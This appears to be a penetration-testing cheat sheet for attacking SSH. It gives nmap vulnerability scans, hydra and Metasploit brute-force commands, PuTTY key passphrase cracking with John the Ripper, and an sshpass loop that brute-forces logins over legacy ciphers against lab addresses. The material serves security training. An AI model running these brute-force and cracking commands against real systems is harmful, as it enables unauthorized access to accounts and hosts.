NMAP Commands
nmap -sCV -p22 10.10.10.10
#nmap Vuln scan
nmap -sC --script vuln,vulners -Pn -p22 10.10.10.10
#nmap Algorithm enum
#if you find CBC & HMAC in ciphers --> vulnerable
nmap -Pn -sS -sV -p 22 --script ssh2-enum-algos 10.10.10.10
Brute Forcing
hydra -L userx.txt -P wordlist.txt -v VICTIM_IP ssh
hydra -l username -P password_file.txt -s port ssh
Enum via Metasploit
#User Enum --> works only on few old versions
use auxiliary/scanner/ssh/ssh_enumusers
#Version Detection
use auxiliary/scanner/ssh/ssh_version
#Brutefocing SSH
use auxiliary/scanner/ssh/ssh_login
#FTP Bruteforce
use auxiliary/scanner/ftp/ftp_login
Cracking SSH Private Key.ppk
sudo apt install putty-tools
#Genrate id_rsa for ssg login, if it asks for password - Password needs to be cracked
puttygen private.ppk -O private-openssh -o id_rsa
putty2john private.ppk > hash
john --format=PuTTY --fork=4 hash -w=wordlist.txt
#Enter the cracked password
puttygen private.ppk -O private-openssh -o id_rsa
RSH - Port 514
Older version of SSH; password cannot be used;
- Either user a private key or allow based on the hosts..
- Depricated
rsh root@10.10.10.10
OLD SSH Ciphers
ssh -oHostKeyAlgorithms=+ssh-dss root@10.10.10.10
#no matching host key type found. Their offer: ssh-rsa,ssh-dss
ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss root@10.10.10.10|
#Bruteforcing SSH using old ciphers
for username in $(cat /usr/share/wordlists/ssh_usernames.txt); do sshpass -p $username ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss $username@10.10.10.10 & done
Comments
Post a Comment